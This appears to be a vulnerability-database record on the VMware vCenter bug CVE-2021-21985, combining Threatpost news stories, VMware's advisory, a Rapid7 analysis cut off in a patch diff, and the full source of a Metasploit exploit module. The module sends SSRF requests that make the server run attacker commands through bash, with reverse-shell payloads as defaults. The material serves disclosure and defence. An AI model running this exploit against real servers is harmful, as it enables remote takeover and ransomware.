Schrader said via email. \u201cWe already see the early effects. Kaseya, SolarWinds, tools that promise access to high-value assets, where an organization\u2019s revenue stream and reputation depends on.\u201d\n\nSchrader thinks that VMware\u2019s recently added capability of [encrypting EXSi servers](<https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.security.doc/GUID-8D7D09AC-8579-4A33-9449-8E8BA49A3003.html>) is \u201ca harbinger of what will come,\u201d pointing to CISA\u2019s recent alert about the top routinely exploited vulnerabilities, which included a [warning about CVE-2021-21985](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/04/unpatched-vmware-vcenter-software>): the critical remote code execution (RCE) [vulnerability in VMware vCenter Server](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) and VMware Cloud Foundation.\n\n\u201cIn essence, not paying a ransom is the only angle that will \u2013 over time \u2013 eradicate ransomware,\u201d Schrader said. \u201cAnd to be positioned for that, companies will have to minimize and protect their attack surface, harden their systems and infrastructure, manage existing accounts properly and delete old ones, patch vulnerabilities according to risks, and be able to operate in a cyber-resilient manner when under attack.\u201d\n\n## Where\u2019s the MBA Coursework About Ransomware?\n\nGroupSense\u2019s Fowler said that the focus has to be on prevention and mitigation before ransomware is deployed. But what about after? \u201cRansomware attacks are a cyber issue up to the point that the ransomware is executed,\u201d he pointed out. \u201cThen it becomes a business issue, and this presents business considerations and continuity hurdles not part of the curriculum on any MBA course I\u2019m familiar with currently.\u201d\n\n072821 16:28 UPDATE: Added input from Mike Fowler.\n\n[](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11 AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T18:33:02", "type": "threatpost", "title": "New Ransomware Gangs Haron & BlackMatter Are After Fat Cats", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2021-07-28T18:33:02", "id": "THREATPOST:6BB33156369CC57707F857196BE6B060", "href": "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-26T19:52:09", "description": "VMware patched a critical bug impacting its vCenter Server platform with a severity rating of 9.8 out of 10. The company said the flaw could allow a remote attacker to exploit its products and take control of a company\u2019s affected system.\n\nVMware went a step further on Tuesday, calling on IT security teams \u2013[ already on high alert over an uptick in costly and destructive ransomware attacks](<https://threatpost.com/ebook-2021-ransomware-emerging-risks/165477/>) \u2013 to patch systems fast. \n[](<https://threatpost.com/newsletter-sign/>)\u201cIn this era of ransomware it is safest to assume that an attacker is already inside the network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible,\u201d wrote VMware\u2019s Bob Plankers, technical marketing architect [in a Tuesday post](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>).\n\n## **Critical Bug Impacts Critical Mass? **\n\nThe vulnerability, [tracked as CVE-2021-21985](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), impacts vCenter Server platforms, which is in widespread use and used to administer VMware\u2019s market leading vSphere and ESXi host products.\n\nClaire Tills, a senior research engineer with Tenable wrote in a post [commenting on the bug](<https://www.tenable.com/blog/cve-2021-21985-critical-vmware-vcenter-server-remote-code-execution?utm_source=email_alert&utm_medium=email&utm_campaign=srt_emails>), \u201cpatching these flaws should be a top priority. Successful exploitation would allow an attacker to execute arbitrary commands on the underlying vCenter host.\u201d\n\nTills note exploiting the vulnerability is trivial. All an attacker would need to do is be able to access vCenter Server over port 443, she wrote. \u201cEven if an organization has not exposed vCenter Server externally, attackers can still exploit this flaw once inside a network.\u201d\n\nKenna Security\u2019s director of security research Jerry Gamblin, however noted estimates of how many networks are vulnerable attacks is relatively small.\n\n\u201cSome early [research from Rapid 7](<https://twitter.com/hrbrmstr/status/1397579958697054211>) shows that only around 6K\u2019s VCenters are exposed directly to the internet, which makes the \u2018blast radius\u2019 tiny and the initial entry point into a network unlikely with this pair of CVES,\u201d Gamblin wrote in an email commentary to Threatpost.\n\nGamblin is referring to both the critical CVE-2021-21985 bug and a second vulnerability reported by VMware on Tuesday, [CVE-2021-21986](<https://www.tenable.com/cve/CVE-2021-21986>). This second bug has a medium CVSS severity rating of 6.5 and is tied to an authentication mechanism issue in vCenter Server plugins.\n\n## **Breaking Down the Critical Bug **\n\nWorkarounds and updates are available to mitigate both flaws, [according to VMware](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>).\n\n\u201cThe vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server,\u201d VMware\u2019s security bulletin states for the critical (CVE-2021-21985) bug. \u201cThe affected Virtual SAN Health Check plug-in is enabled by default in all vCenter Server deployments, whether or not vSAN is being used.\u201d\n\nVMware\u2019s Virtual San (or vSAN) is a software-defined storage solution that typically supports hyper-converged infrastructure. The Health Check plug-in \u201cchecks to monitor the status of cluster components, diagnose issues, and troubleshoot problems,\u201d according to a [VMware description of the tool](<https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.vsan-monitoring.doc/GUID-B0A8BF17-E3FB-421A-AC1A-8C1EC27294D5.html>).\n\nVMware credited the researcher identified only as \u201cRicter Z\u201d of 360 Noah Lab for finding the bug.\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on**** **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** ****for free.**\n", "cvss3": {}, "published": "2021-05-26T19:45:50", "type": "threatpost", "title": "VMware Sounds Ransomware Alarm Over Critical Severity Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986"], "modified": "2021-05-26T19:45:50", "id": "THREATPOST:DAA85537BDD9022F1F98B328EFF7B7B9", "href": "https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2022-05-26T00:56:13", "description": "3a. VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client (CVE-2021-21985) \n\nThe vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. Authentication mechanism issue in vCenter Server Plug-ins (CVE-2021-21986) \n\nThe vSphere Client (HTML5) contains a vulnerability in a vSphere authentication mechanism for the Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-25T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address remote code execution and authentication vulnerabilities (CVE-2021-21985, CVE-2021-21986)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986"], "modified": "2021-05-25T00:00:00", "id": "VMSA-2021-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0010.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2022-11-02T03:03:16", "description": "This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. Tested against VMware vCenter Server 6.7 Update 3m (Linux appliance).\n", "cvss3": {}, "published": "2021-07-12T18:07:05", "type": "metasploit", "title": "VMware vCenter Server Virtual SAN Health Check Plugin RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-2021", "CVE-2021-21985"], "modified": "2021-07-13T01:29:56", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_VSAN_HEALTH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Virtual SAN Health Check Plugin RCE',\n 'Description' => %q{\n This module exploits Java unsafe reflection and SSRF in the VMware\n vCenter Server Virtual SAN Health Check plugin's ProxygenController\n class to execute code as the vsphere-ui user.\n\n See the vendor advisory for affected and patched versions. Tested\n against VMware vCenter Server 6.7 Update 3m (Linux appliance).\n },\n 'Author' => [\n 'Ricter Z', # Discovery and PoC used\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21985'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0010.html'],\n ['URL', 'https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis'],\n ['URL', 'http://noahblog.360.cn/vcenter-cve-2021-2021-21985/'],\n # Other great writeups!\n ['URL', 'https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/'],\n ['URL', 'https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5'],\n ['URL', 'https://y4y.space/2021/06/04/learning-jndi-injection-from-cve-2021-21985/'],\n ['URL', 'https://github.com/alt3kx/CVE-2021-21985_PoC']\n ],\n 'DisclosureDate' => '2021-05-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # SSRF can be a little finicky\n 'SideEffects' => [\n IOC_IN_LOGS, # /var/log/vmware/vsphere-ui/logs/vsphere_client_virgo.log\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(\n target_uri.path,\n '/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty'\n ),\n 'ctype' => 'application/json',\n 'data' => {\n 'methodInput' => ['user.name', nil]\n }.to_json\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.get_json_document['result'] == 'vsphere-ui'\n return CheckCode::Safe\n end\n\n CheckCode::Vulnerable('System property user.name is vsphere-ui.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(cmd)\n\n url = OfflineBundle.new(cmd).to_url\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(\n target_uri.path,\n '/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages'\n ),\n 'ctype' => 'application/json',\n 'data' => {\n 'methodInput' => [\n [\"https://localhost/vsanHealth/vum/driverOfflineBundle/#{url}\"],\n false # lazyInit\n ]\n }.to_json\n )\n\n fail_with(Failure::PayloadFailed, cmd) unless res&.code == 200\n end\n\n class OfflineBundle\n attr_accessor :cmd\n\n def initialize(cmd)\n @cmd = cmd\n end\n\n def to_xml\n bean = Rex::Text.rand_text_alpha_lower(8..16)\n prop = Rex::Text.rand_text_alpha_lower(8..16)\n\n # https://www.tutorialspoint.com/spring/spring_bean_definition.htm\n <<~XML\n <beans>\n <bean id=\"#{bean}\" class=\"java.lang.ProcessBuilder\">\n <constructor-arg>\n <list>\n <value>/bin/bash</value>\n <value>-c</value>\n <value><![CDATA[#{cmd}]]></value>\n </list>\n </constructor-arg>\n <property name=\"#{prop}\" value=\"\\#{#{bean}.start()}\"/>\n </bean>\n </beans>\n XML\n end\n\n def to_zip\n Msf::Util::EXE.to_zip([\n fname: 'offline_bundle.xml',\n data: to_xml.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ])\n end\n\n def to_url\n # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/Data_URIs\n \"data:application/zip;base64,#{Rex::Text.encode_base64(to_zip)}\"\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_vsan_health_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "seebug": [{"lastseen": "2021-07-24T09:59:06", "description": "Rapid7\n\n[May 26, 2021 5:34pm UTC (1 day ago)](https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?#rapid7-analysis)\u2022 Last updated May 27, 2021 6:39pm UTC (7 hours ago)\n\n\n\n###### Technical Analysis\n\n**Threat status:** Impending threat\n**Attacker utility:** Network infrastructure compromise\n\n## Description\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](https://www.vmware.com/security/advisories/VMSA-2021-0010.html), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server and VMware Cloud Foundation. The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nVMware has released a [blog post](https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html) and a [supplemental FAQ](https://core.vmware.com/resource/vmsa-2021-0010-faq) for VMSA-2021-0010, which highlights the elevated threat of ransomware, including against organizations running vCenter Server. As of May 26, 2021, there are no reports of exploitation in the wild\u2014this, however, is unlikely to last.\n\n## Affected products\n\n- vCenter Server 6.5\n- vCenter Server 6.7\n- vCenter Server 7.0\n- Cloud Foundation (vCenter Server) 3.x\n- Cloud Foundation (vCenter Server) 4.x\n\nFor information on fixed versions, see the matrix of affected products and updates in VMware\u2019s advisory: https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n\n## Rapid7 analysis\n\nAs with [previous vCenter Server vulnerabilities](https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis), we classify CVE-2021-21985 as an impending threat: It is a high-value attack target for both advanced and commodity threat actors, and we expect exploitation to occur quickly and at scale. As of May 26, 2021, Rapid7 Labs identified roughly 6,000 vCenter Server instances exposed to the public internet.\n\n### Patch\n\nThe following changes add authentication to the Virtual SAN Health Check plugin\u2019s `/rest/*` endpoints:\n\n```xml\n--- a/unpatched/src/h5-vsan-context.jar/WEB-INF/web.xml\n+++ b/patched/src/h5-vsan-context.jar/WEB-INF/web.xml\n@@ -5,6 +5,21 @@\n\n <display-name>h5-vsan-service</display-name>\n\n+ <context-param>\n+ <param-name>contextConfigLocation</param-name>\n+ <param-value>/WEB-INF/spring/bundle-context.xml</param-value>\n+ </context-param>\n+\n+ <!-- The application context needs to be OSGI-enabled in order to look up services -->\n+ <context-param>\n+ <param-name>contextClass</param-name>\n+ <param-value>org.eclipse.virgo.web.dm.ServerOsgiBundleXmlWebApplicationContext</param-value>\n+ </context-param>\n+\n+ <listener>\n+ <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>\n+ </listener>\n+\n <!-- Processes application requests -->\n <servlet>\n <servlet-name>springServlet</servlet-name>\n@@ -12,7 +27,7 @@\n\n <init-param>\n <param-name>contextConfigLocation</param-name>\n- <param-value>/WEB-INF/spring/bundle-context.xml</param-value>\n+ 